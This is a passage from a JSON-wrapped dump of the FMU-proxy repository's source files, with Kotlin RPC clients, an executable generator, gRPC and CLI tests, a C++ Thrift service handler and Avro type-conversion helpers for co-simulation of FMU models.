}\n\n override fun bulkWriteReal(fmuId: Int, vr: List<Int>, value: List<Real>): FmiStatus {\n return service.bulkWriteReal(fmuId, vr, value).convert()\n }\n\n override fun writeString(fmuId: Int, vr: ValueReference, value: String): FmiStatus {\n return service.writeString(fmuId, vr, value).convert()\n }\n\n override fun bulkWriteString(fmuId: Int, vr: List<Int>, value: List<String>): FmiStatus {\n return service.bulkWriteString(fmuId, vr, value).convert()\n }\n\n override fun writeBoolean(fmuId: Int, vr: ValueReference, value: Boolean): FmiStatus {\n return service.writeBoolean(fmuId, vr, value).convert()\n }\n\n override fun bulkWriteBoolean(fmuId: Int, vr: List<Int>, value: List<Boolean>): FmiStatus {\n return service.bulkWriteBoolean(fmuId, vr, value).convert()\n }\n\n override fun createInstanceFromCS(): Int {\n return service.createInstanceFromCS()\n }\n\n override fun createInstanceFromME(solver: Solver): Int {\n return service.createInstanceFromME(solver.avroType())\n }\n\n override fun close() {\n super.close()\n client.close()\n }\n\n}" }, { "alpha_fraction": 0.5856621861457825, "alphanum_fraction": 0.587918758392334, "avg_line_length": 35.69426727294922, "blob_id": "c8d5881063914efaa347ccdfc45d8d14a98a7c0d", "content_id": "dd207dc715bcc977d5a3ff0332750cfb137bfac3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 5761, "license_type": "permissive", "max_line_length": 130, "num_lines": 157, "path": "/java/FMU-proxy/fmu-proxy-gen/src/main/kotlin/no/mechatronics/sfi/fmuproxy/ExecutableGenerator.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy\n\nimport no.mechatronics.sfi.fmi4j.modeldescription.ModelDescriptionParser\nimport no.mechatronics.sfi.fmuproxy.codegen.ProtoGen\nimport no.mechatronics.sfi.fmuproxy.codegen.ServerGen\nimport no.mechatronics.sfi.fmuproxy.utils.copyZippedContent\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\nimport java.io.FileInputStream\nimport java.io.FileOutputStream\nimport java.io.InputStream\nimport java.nio.file.Files\n\n\nconst val PACKAGE_NAME = \"no.mechatronics.sfi.fmuproxy\"\nconst val KOTLIN_SRC_OUTPUT_FOLDER = \"src/main/kotlin/\"\nconst val PROTO_SRC_OUTPUT_FOLDER = \"src/main/proto/\"\n\n/**\n *\n * @author Lars Ivar Hatledal\n */\nclass ExecutableGenerator(\n private val inputStream: InputStream,\n private val modelDescriptionXml: String\n) {\n\n constructor(file: File): this(FileInputStream(file), ModelDescriptionParser.extractModelDescriptionXml(FileInputStream(file)))\n\n @JvmOverloads\n fun generate(outDir: File? = null) {\n\n @Suppress(\"NAME_SHADOWING\")\n val outDir: File = outDir ?: File(defaultOut)\n\n val modelDescription = ModelDescriptionParser.parse(modelDescriptionXml)\n //val tempDir = Files.createTempDirectory(\"fmuproxy\").toFile()\n\n val baseFile = File(modelDescription.modelName).apply {\n if (!exists() && mkdir()) {\n LOG.debug(\"Created folder $absolutePath\")\n }\n }\n\n try {\n\n \"build.gradle\".also { name ->\n File(baseFile, name).also { file ->\n FileOutputStream(file).use { fos ->\n javaClass.classLoader.getResourceAsStream(name).use { resource ->\n resource.copyTo(fos)\n }\n LOG.debug(\"Copied $name to $file\")\n }\n }\n }\n\n File(baseFile, \"settings.gradle\").also { file ->\n file.createNewFile()\n }\n\n copyZippedContent(baseFile, javaClass.classLoader.getResourceAsStream(\"gradlew.zip\"))\n\n val resourcesFile = File(baseFile,\"src/main/resources/\").apply {\n if (!exists()) {\n Files.createDirectories(this.toPath())\n }\n }\n\n File(resourcesFile, \"modelDescription.xml\").also { file ->\n file.writeText(modelDescriptionXml)\n }\n\n \"log4j.properties\".also { name ->\n File(resourcesFile, name).also { file ->\n FileOutputStream(file).use { fos ->\n javaClass.classLoader.getResourceAsStream(name).use { resource ->\n resource.copyTo(fos)\n }\n LOG.debug(\"Copied $name to $file\")\n }\n }\n }\n\n File(resourcesFile, \"${modelDescription.modelName}.fmu\").also { file ->\n FileOutputStream(file).use { fos ->\n inputStream.use { it.copyTo(fos) }\n }\n }\n\n ProtoGen.generateProtoCode(modelDescription, baseFile)\n ServerGen.generateServerCode(modelDescription, baseFile)\n\n ProcessBuilder()\n .directory(baseFile)\n .command(\"${baseFile.absolutePath}/gradlew.bat\", \"shadowJar\")\n .redirectError(ProcessBuilder.Redirect.INHERIT)\n .redirectOutput(ProcessBuilder.Redirect.INHERIT)\n .start()\n .waitFor().also {status ->\n\n if (status == 0) {\n val fileName = \"${modelDescription.modelName}.jar\"\n File(baseFile, \"build/libs/$fileName\").apply {\n if (exists()) {\n val target = File(outDir, fileName)\n copyTo(target, overwrite = true)\n LOG.info(\"Executable '$name' is located here: '$target'\")\n }\n }\n } else {\n LOG.error(\"Process returned with status: $status\")\n }\n }\n } finally {\n if (baseFile.deleteRecursively()) {\n LOG.debug(\"Deleted temp folder: $baseFile\")\n } else {\n LOG.warn(\"Failed to delete folder: $baseFile\")\n }\n }\n\n }\n\n companion object {\n private val LOG: Logger = LoggerFactory.getLogger(ExecutableGenerator::class.java)\n\n private const val defaultOut = \".\"\n\n }\n\n}\n" }, { "alpha_fraction": 0.6711603403091431, "alphanum_fraction": 0.6803081631660461, "avg_line_length": 27.08108139038086, "blob_id": "8099b2bffef5480e37fe28b351b94f29112b13c6", "content_id": "3bed2338eb2d5186bb7bf369b304ac5301aaa70c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2077, "license_type": "permissive", "max_line_length": 104, "num_lines": 74, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/grpc/TestGrpcTorsionBar.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy.grpc\n\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmuproxy.TestUtils\nimport no.mechatronics.sfi.fmuproxy.runInstance\nimport org.junit.jupiter.api.AfterAll\nimport org.junit.jupiter.api.Assertions\nimport org.junit.jupiter.api.Test\nimport org.junit.jupiter.api.TestInstance\nimport org.junit.jupiter.api.condition.EnabledIfEnvironmentVariable\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\n\n@TestInstance(TestInstance.Lifecycle.PER_CLASS)\n@EnabledIfEnvironmentVariable(named = \"TEST_FMUs\", matches = \".*\")\nclass TestGrpcTorsionBar {\n\n companion object {\n private val LOG: Logger = LoggerFactory.getLogger(TestGrpcTorsionBar::class.java)\n }\n\n private val fmu: Fmu\n private val server: GrpcFmuServer\n private val client: GrpcFmuClient\n private val modelDescription: CommonModelDescription\n\n init {\n\n fmu = Fmu.from(File(TestUtils.getTEST_FMUs(),\n \"FMI_2.0/CoSimulation/${TestUtils.getOs()}/20sim/4.6.4.8004/TorsionBar/TorsionBar.fmu\"))\n modelDescription = fmu.modelDescription\n\n server = GrpcFmuServer(fmu)\n val port = server.start()\n\n client = GrpcFmuClient(\"localhost\", port)\n\n }\n\n @AfterAll\n fun tearDown() {\n client.close()\n server.close()\n fmu.close()\n }\n\n @Test\n fun testGuid() {\n val guid = client.modelDescription.guid.also { LOG.info(\"guid=$it\") }\n Assertions.assertEquals(modelDescription.guid, guid)\n }\n\n @Test\n fun testModelName() {\n val modelName = client.modelDescription.modelName.also { LOG.info(\"modelName=$it\") }\n Assertions.assertEquals(modelDescription.modelName, modelName)\n }\n\n @Test\n fun testInstance() {\n\n client.newInstance().use { instance ->\n val dt = 1E-3\n val stop = 2.0\n runInstance(instance, dt, stop).also {\n LOG.info(\"Duration=${it}ms\")\n }\n }\n\n }\n\n}" }, { "alpha_fraction": 0.7384279370307922, "alphanum_fraction": 0.7406113743782043, "avg_line_length": 31.027971267700195, "blob_id": "06b48fc84d709f3d502a14fd7dc8f93e811fad69", "content_id": "d93a74abb6b5d9ab6281317aeab7402ca76c32d8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4580, "license_type": "permissive", "max_line_length": 120, "num_lines": 143, "path": "/cpp/FMU-proxy/server/FmuServiceHandler.cpp", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "//\n// Created by laht on 08.06.18.\n//\n\n#include \"../common/FmuWrapper.h\"\n#include \"FmuServiceHandler.h\"\n\nint id_gen = 0;\n\nusing namespace fmuproxy;\nusing namespace fmuproxy::thrift;\nusing namespace fmuproxy::server;\n\n::FmuServiceHandler::FmuServiceHandler(shared_ptr<FmuWrapper> fmu) {\n this->fmu = fmu;\n}\n\nvoid FmuServiceHandler::getModelDescriptionXml(std::string &_return) {\n _return = \"XML placeholder\";\n}\n\nvoid FmuServiceHandler::getModelDescription(ModelDescription &_return) {\n _return = *fmu->getModelDescription();\n}\n\nFmuId FmuServiceHandler::createInstanceFromCS() {\n shared_ptr<FmuInstance> instance = fmu->newInstance();\n FmuId my_id = id_gen++;\n fmus[my_id] = instance;\n cout << \"create instance with id=\" << my_id << endl;\n return my_id;\n}\n\nFmuId FmuServiceHandler::createInstanceFromME(const Solver &solver) {\n return 0;\n}\n\nbool FmuServiceHandler::canGetAndSetFMUstate(const FmuId fmu_id) {\n return false;\n}\n\ndouble FmuServiceHandler::getCurrentTime(const FmuId fmu_id) {\n shared_ptr<FmuInstance> instance = fmus[fmu_id];\n return instance->getCurrentTime();\n}\n\nbool FmuServiceHandler::isTerminated(const FmuId fmu_id) {\n shared_ptr<FmuInstance> instance = fmus[fmu_id];\n return instance->isTerminated();\n}\n\nStatus::type FmuServiceHandler::init(const FmuId fmu_id, const double start, const double stop) {\n shared_ptr<FmuInstance> instance = fmus[fmu_id];\n instance->init(start, stop);\n return ::Status::OK_STATUS;\n}\n\nvoid FmuServiceHandler::step(StepResult &_return, const FmuId fmu_id, const double step_size) {\n shared_ptr<FmuInstance> instance = fmus[fmu_id];\n instance->step(step_size, _return);\n}\n\nStatus::type FmuServiceHandler::terminate(const FmuId fmu_id) {\n shared_ptr<FmuInstance>instance = fmus[fmu_id];\n Status::type status = instance->terminate();\n fmus.erase(fmu_id);\n return status;\n}\n\nStatus::type FmuServiceHandler::reset(const FmuId fmu_id) {\n shared_ptr<FmuInstance> instance = fmus[fmu_id];\n return instance->reset();\n}\n\nvoid FmuServiceHandler::readInteger(IntegerRead &_return, const FmuId fmu_id, const ValueReference vr) {\n shared_ptr<FmuInstance> instance = fmus[fmu_id];\n instance->getInteger(vr, _return);\n}\n\nvoid FmuServiceHandler::bulkReadInteger(IntegerArrayRead &_return, const FmuId fmu_id, const ValueReferences &vr) {\n\n}\n\nvoid FmuServiceHandler::readReal(RealRead &_return, const FmuId fmu_id, const ValueReference vr) {\n shared_ptr<FmuInstance> instance = fmus[fmu_id];\n instance->getReal(vr, _return);\n}\n\nvoid FmuServiceHandler::bulkReadReal(RealArrayRead &_return, const FmuId fmu_id, const ValueReferences &vr) {\n\n}\n\nvoid FmuServiceHandler::readString(StringRead &_return, const FmuId fmu_id, const ValueReference vr) {\n shared_ptr<FmuInstance> instance = fmus[fmu_id];\n instance->getString(vr, _return);\n}\n\nvoid FmuServiceHandler::bulkReadString(StringArrayRead &_return, const FmuId fmu_id, const ValueReferences &vr) {\n\n}\n\nvoid FmuServiceHandler::readBoolean(BooleanRead &_return, const FmuId fmu_id, const ValueReference vr) {\n shared_ptr<FmuInstance> instance = fmus[fmu_id];\n instance->getBoolean(vr, _return);\n}\n\nvoid FmuServiceHandler::bulkReadBoolean(BooleanArrayRead &_return, const FmuId fmu_id, const ValueReferences &vr) {\n\n}\n\nStatus::type FmuServiceHandler::writeInteger(const FmuId fmu_id, const ValueReference vr, const int32_t value) {\n return Status::type::DISCARD_STATUS;\n}\n\nStatus::type FmuServiceHandler::bulkWriteInteger(const FmuId fmu_id, const ValueReferences &vr, const IntArray &value) {\n return Status::type::DISCARD_STATUS;\n}\n\nStatus::type FmuServiceHandler::writeReal(const FmuId fmu_id, const ValueReference vr, const double value) {\n return Status::type::DISCARD_STATUS;\n}\n\nStatus::type FmuServiceHandler::bulkWriteReal(const FmuId fmu_id, const ValueReferences &vr, const RealArray &value) {\n return Status::type::DISCARD_STATUS;\n}\n\nStatus::type FmuServiceHandler::writeString(const FmuId fmu_id, const ValueReference vr, const std::string &value) {\n return Status::type::DISCARD_STATUS;\n}\n\nStatus::type\nFmuServiceHandler::bulkWriteString(const FmuId fmu_id, const ValueReferences &vr, const StringArray &value) {\n return Status::type::DISCARD_STATUS;\n}\n\nStatus::type FmuServiceHandler::writeBoolean(const FmuId fmu_id, const ValueReference vr, const bool value) {\n return Status::type::DISCARD_STATUS;\n}\n\nStatus::type\nFmuServiceHandler::bulkWriteBoolean(const FmuId fmu_id, const ValueReferences &vr, const BooleanArray &value) {\n return Status::type::DISCARD_STATUS;\n}\n" }, { "alpha_fraction": 0.6466110348701477, "alphanum_fraction": 0.6484453678131104, "avg_line_length": 38.219425201416016, "blob_id": "46b1266eb459ca85c551071c198c937483af42dd", "content_id": "d10994ad37a4b12db22b552a99abc0c6b51f9aaf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 10903, "license_type": "permissive", "max_line_length": 102, "num_lines": 278, "path": "/java/FMU-proxy/fmu-proxy-clients/src/main/kotlin/no/mechatronics/sfi/fmuproxy/RpcFmuClient.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy\n\nimport no.mechatronics.sfi.fmi4j.common.*\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.AbstractTypedScalarVariable\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.Closeable\n\n\nabstract class RpcFmuClient: Closeable {\n\n protected companion object {\n\n val LOG: Logger = LoggerFactory.getLogger(RpcFmuClient::class.java)\n\n val NAME_TO_VALUE_REF = mutableMapOf<String, Int>()\n\n internal object FmuInstances: ArrayList<FmuInstance>() {\n internal fun terminateAll() {\n forEach{ it.terminate() }\n }\n }\n }\n\n abstract val modelDescriptionXml: String\n abstract val modelDescription: CommonModelDescription\n\n protected abstract fun getCurrentTime(fmuId: Int): Double\n protected abstract fun isTerminated(fmuId: Int): Boolean\n protected abstract fun init(fmuId: Int, start: Double, stop: Double): FmiStatus\n protected abstract fun terminate(fmuId: Int): FmiStatus\n protected abstract fun step(fmuId: Int, stepSize: Double): Pair<Double, FmiStatus>\n protected abstract fun reset(fmuId: Int): FmiStatus\n\n internal abstract fun readInteger(fmuId: Int, vr: ValueReference): FmuIntegerRead\n internal abstract fun bulkReadInteger(fmuId: Int, vr: List<Int>): FmuIntegerArrayRead\n\n internal abstract fun readReal(fmuId: Int, vr: ValueReference): FmuRealRead\n internal abstract fun bulkReadReal(fmuId: Int, vr: List<Int>): FmuRealArrayRead\n\n internal abstract fun readString(fmuId: Int, vr: ValueReference): FmuStringRead\n internal abstract fun bulkReadString(fmuId: Int, vr: List<Int>): FmuStringArrayRead\n\n internal abstract fun readBoolean(fmuId: Int, vr: ValueReference): FmuBooleanRead\n internal abstract fun bulkReadBoolean(fmuId: Int, vr: List<Int>): FmuBooleanArrayRead\n\n internal abstract fun writeInteger(fmuId: Int, vr: ValueReference, value: Int): FmiStatus\n internal abstract fun bulkWriteInteger(fmuId: Int, vr: List<Int>, value: List<Int>): FmiStatus\n\n internal abstract fun writeReal(fmuId: Int, vr: ValueReference, value: Real): FmiStatus\n internal abstract fun bulkWriteReal(fmuId: Int, vr: List<Int>, value: List<Real>): FmiStatus\n\n internal abstract fun writeString(fmuId: Int, vr: ValueReference, value: String): FmiStatus\n internal abstract fun bulkWriteString(fmuId: Int, vr: List<Int>, value: List<String>): FmiStatus\n\n internal abstract fun writeBoolean(fmuId: Int, vr: ValueReference, value: Boolean): FmiStatus\n internal abstract fun bulkWriteBoolean(fmuId: Int, vr: List<Int>, value: List<Boolean>): FmiStatus\n\n protected abstract fun createInstanceFromCS(): Int\n protected abstract fun createInstanceFromME(solver: Solver): Int\n\n protected fun process(name: String): Int {\n return NAME_TO_VALUE_REF.getOrPut(name, {\n modelDescription.modelVariables.getValueReference(name)\n })\n }\n\n @JvmOverloads\n fun newInstance(solver: Solver? = null): FmuInstance {\n val fmuId = if(solver == null) {\n createInstanceFromCS()\n } else {\n createInstanceFromME(solver)\n }\n return FmuInstance(fmuId).also {\n FmuInstances.add(it)\n }\n }\n\n fun stop() {\n close()\n }\n\n override fun close() {\n LOG.info(\"Closing..\")\n FmuInstances.terminateAll()\n }\n\n inner class FmuInstance(\n private val fmuId: Int\n ): FmiSimulation, FmuVariableAccessor {\n\n override val isTerminated: Boolean\n get() = isTerminated(fmuId)\n\n override val variableAccessor = this\n\n override var isInitialized = false\n private set\n\n override var lastStatus = FmiStatus.NONE\n override var currentTime: Double = 0.0\n\n override val modelDescription\n get() = [email protected]\n\n init {\n currentTime = getCurrentTime(fmuId)\n modelDescription.modelVariables.forEach { variable ->\n if (variable is AbstractTypedScalarVariable<*>) {\n variable::class.java.getField(\"accessor\").also { field ->\n field.set(variable, variableAccessor)\n }\n }\n }\n }\n\n override fun init() = init(0.0)\n override fun init(start: Double) = init(start, 0.0)\n override fun init(start: Double, stop: Double) {\n init(fmuId, start, stop).also {\n lastStatus = it\n isInitialized = true\n }\n }\n\n override fun doStep(stepSize: Double): Boolean {\n val stepResult = step(fmuId, stepSize)\n currentTime = stepResult.first\n lastStatus = stepResult.second\n return lastStatus == FmiStatus.OK\n }\n\n override fun terminate(): Boolean {\n return try {\n terminate(fmuId).also {\n lastStatus = it\n } == FmiStatus.OK\n } finally {\n FmuInstances.remove(this)\n }\n }\n\n override fun reset(): Boolean {\n return reset(fmuId).also {\n lastStatus = it\n } == FmiStatus.OK\n }\n\n override fun close() {\n terminate()\n }\n\n override fun readBoolean(name: String)\n = readBoolean(fmuId, process(name)).also { lastStatus = it.status }\n\n override fun readBoolean(vr: ValueReference)\n = readBoolean(fmuId, vr).also { lastStatus = it.status }\n\n override fun readBoolean(vr: ValueReferences)\n = bulkReadBoolean(fmuId, vr.toList()).also { lastStatus = it.status }\n\n override fun readBoolean(vr: ValueReferences, value: BooleanArray)\n = bulkReadBoolean(fmuId, vr.toList()).also { lastStatus = it.status }\n\n override fun readBoolean(vr: ValueReferences, value: IntArray)\n = bulkReadInteger(fmuId, vr.toList()).also { lastStatus = it.status }\n\n\n override fun readInteger(name: String)\n = readInteger(fmuId, process(name)).also { lastStatus = it.status }\n\n override fun readInteger(vr: ValueReference)\n = readInteger(fmuId, vr).also { lastStatus = it.status }\n\n override fun readInteger(vr: ValueReferences)\n = bulkReadInteger(fmuId, vr.toList()).also { lastStatus = it.status }\n\n override fun readInteger(vr: ValueReferences, value: IntArray)\n = bulkReadInteger(fmuId, vr.toList()).also { lastStatus = it.status }\n\n\n override fun readReal(name: String)\n = readReal(fmuId, process(name)).also { lastStatus = it.status }\n\n override fun readReal(vr: ValueReference)\n = readReal(fmuId, vr).also { lastStatus = it.status }\n\n override fun readReal(vr: ValueReferences)\n = bulkReadReal(fmuId, vr.toList()).also { lastStatus = it.status }\n\n override fun readReal(vr: ValueReferences, value: RealArray)\n = bulkReadReal(fmuId, vr.toList()).also { lastStatus = it.status }\n\n\n override fun readString(name: String)\n = readString(fmuId, process(name)).also { lastStatus = it.status }\n\n override fun readString(vr: ValueReference)\n = readString(fmuId, vr).also { lastStatus = it.status }\n\n override fun readString(vr: ValueReferences)\n = bulkReadString(fmuId, vr.toList()).also { lastStatus = it.status }\n\n override fun readString(vr: ValueReferences, value: StringArray)\n = bulkReadString(fmuId, vr.toList()).also { lastStatus = it.status }\n\n\n override fun writeBoolean(name: String, value: Boolean)\n = writeBoolean(fmuId, process(name), value).also { lastStatus = it }\n\n override fun writeBoolean(vr: ValueReference, value: Boolean)\n = writeBoolean(fmuId, vr, value).also { lastStatus = it }\n\n override fun writeBoolean(vr: ValueReferences, value: BooleanArray)\n = bulkWriteBoolean(fmuId, vr.toList(), value.toList()).also { lastStatus = it }\n\n override fun writeBoolean(vr: ValueReferences, value: IntArray)\n = bulkWriteBoolean(fmuId, vr.toList(), value.map { it != 0 })\n\n\n override fun writeInteger(name: String, value: Int)\n = writeInteger(fmuId, process(name), value).also { lastStatus = it }\n\n override fun writeInteger(vr: ValueReference, value: Int)\n = writeInteger(fmuId, vr, value).also { lastStatus = it }\n\n override fun writeInteger(vr: ValueReferences, value: IntArray)\n = bulkWriteInteger(fmuId, vr.toList(), value.toList())\n\n\n override fun writeReal(name: String, value: Real)\n = writeReal(fmuId, process(name), value).also { lastStatus = it }\n\n override fun writeReal(vr: ValueReference, value: Real)\n = writeReal(fmuId, vr, value).also { lastStatus = it }\n\n override fun writeReal(vr: ValueReferences, value: RealArray)\n = bulkWriteReal(fmuId, vr.toList(), value.toList()).also { lastStatus = it }\n\n\n override fun writeString(name: String, value: String)\n = writeString(fmuId, process(name), value).also { lastStatus = it }\n\n override fun writeString(vr: ValueReference, value: String)\n = writeString(fmuId, vr, value).also { lastStatus = it }\n\n override fun writeString(vr: ValueReferences, value: StringArray)\n = bulkWriteString(fmuId, vr.toList(), value.toList()).also { lastStatus = it }\n\n }\n\n}\n" }, { "alpha_fraction": 0.48769819736480713, "alphanum_fraction": 0.5177692770957947, "avg_line_length": 22.461538314819336, "blob_id": "6da53cf05450971d92b53bef90ba766557eea9ad", "content_id": "ca86bc792dbddeb959c6d87cebf9c74a1adc7c4b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 1829, "license_type": "permissive", "max_line_length": 107, "num_lines": 78, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/TestCliParser.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy\n\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmuproxy.cli.CommandLineParser\nimport org.junit.jupiter.api.Test\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\nimport java.net.MalformedURLException\nimport java.net.URL\n\nprivate const val fmuPath = \"jar:file:../../../test/HydraulicCylinder.jar!/HydraulicCylinder.fmu\"\n\nclass TestCliParser {\n\n companion object {\n val LOG: Logger = LoggerFactory.getLogger(TestCliParser::class.java)\n }\n\n @Test\n fun testPath() {\n\n File(fmuPath).let { file ->\n\n if (file.exists()) {\n Fmu.from(file)\n } else {\n try {\n Fmu.from(URL(fmuPath))\n } catch (ex: MalformedURLException) {\n LOG.error(\"Interpreted fmuPath as an URL, but an MalformedURLException was thrown\", ex)\n null\n }\n }\n\n }?.close()\n\n }\n\n @Test\n fun test1() {\n\n var args1 = arrayOf(\n \"--remote\", \"127.0.0.1:8888\",\n \"-grpc\", \"8000\")\n\n args1 += arrayOf(\"-fmu\", \"$fmuPath\")\n CommandLineParser.parse(args1)?.use { proxy ->\n\n proxy.start()\n LOG.info(\"${proxy.networkInfo}\")\n\n }\n }\n\n @Test\n fun test2() {\n\n var args2 = arrayOf(\n \"--remote\", \"127.0.0.1:8888\",\n \"-thrift\", \"8001\",\n \"-jsonrpc/http\", \"8002\",\n \"-jsonrpc/ws\", \"8003\",\n \"-jsonrpc/tcp\", \"8004\",\n \"-jsonrpc/zmq\", \"8005\"\n )\n\n args2 += arrayOf(\"-fmu\", \"$fmuPath\")\n CommandLineParser.parse(args2)?.use { proxy ->\n\n proxy.start()\n LOG.info(\"${proxy.networkInfo}\")\n\n }\n\n }\n\n}" }, { "alpha_fraction": 0.713220477104187, "alphanum_fraction": 0.7144040465354919, "avg_line_length": 41.244998931884766, "blob_id": "4e690e40a813d80bc15189ad07c78418aae8e695", "content_id": "5cf9a25311287436d2671201262f89ab562a4007", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 8449, "license_type": "permissive", "max_line_length": 116, "num_lines": 200, "path": "/java/FMU-proxy/fmu-proxy/src/main/kotlin/no/mechatronics/sfi/fmuproxy/avro/services/extensions.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy.avro.services\n\nimport no.mechatronics.sfi.fmi4j.common.*\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmi4j.modeldescription.misc.DefaultExperiment\nimport no.mechatronics.sfi.fmi4j.modeldescription.structure.DependenciesKind\nimport no.mechatronics.sfi.fmi4j.modeldescription.structure.ModelStructure\nimport no.mechatronics.sfi.fmi4j.modeldescription.structure.Unknown\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.*\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.Causality\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.Initial\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.Variability\nimport no.mechatronics.sfi.fmuproxy.avro.*\nimport no.mechatronics.sfi.fmuproxy.avro.ScalarVariable\n\ninternal fun FmuIntegerRead.avroType()\n = IntegerRead(value, status.avroType())\n\ninternal fun FmuRealRead.avroType()\n = RealRead(value, status.avroType())\n\ninternal fun FmuStringRead.avroType()\n = StringRead(value, status.avroType())\n\ninternal fun FmuBooleanRead.avroType()\n = BooleanRead(value, status.avroType())\n\ninternal fun FmuIntegerArrayRead.avroType()\n = IntegerArrayRead(value.toList(), status.avroType())\n\ninternal fun FmuRealArrayRead.avroType()\n = RealArrayRead(value.toList(), status.avroType())\n\ninternal fun FmuStringArrayRead.avroType()\n = StringArrayRead(value.toList(), status.avroType())\n\ninternal fun FmuBooleanArrayRead.avroType()\n = BooleanArrayRead(value.toList(), status.avroType())\n\ninternal fun IntegerVariable.avroType(): no.mechatronics.sfi.fmuproxy.avro.IntegerAttribute {\n return no.mechatronics.sfi.fmuproxy.avro.IntegerAttribute().also { attribute ->\n min?.also { attribute.min = it }\n max?.also { attribute.max = it }\n start?.also { attribute.start = it }\n }\n}\n\ninternal fun RealVariable.avroType(): no.mechatronics.sfi.fmuproxy.avro.RealAttribute {\n return no.mechatronics.sfi.fmuproxy.avro.RealAttribute().also { attribute ->\n min?.also { attribute.min = it }\n max?.also { attribute.max = it }\n start?.also { attribute.start = it }\n }\n}\n\ninternal fun StringVariable.avroType(): no.mechatronics.sfi.fmuproxy.avro.StringAttribute {\n return no.mechatronics.sfi.fmuproxy.avro.StringAttribute().also { attribute ->\n start?.also { attribute.start = it }\n }\n}\n\ninternal fun BooleanVariable.avroType(): no.mechatronics.sfi.fmuproxy.avro.BooleanAttribute {\n return no.mechatronics.sfi.fmuproxy.avro.BooleanAttribute().also { attribute ->\n start?.also { attribute.start = it }\n }\n}\n\ninternal fun EnumerationVariable.avroType(): no.mechatronics.sfi.fmuproxy.avro.EnumerationAttribute {\n return no.mechatronics.sfi.fmuproxy.avro.EnumerationAttribute().also { attribute ->\n min?.also { attribute.min = it }\n max?.also { attribute.max = it }\n start?.also { attribute.start = it }\n }\n}\n\ninternal fun TypedScalarVariable<*>.avroType(): ScalarVariable {\n return no.mechatronics.sfi.fmuproxy.avro.ScalarVariable().also { v ->\n v.name = name\n 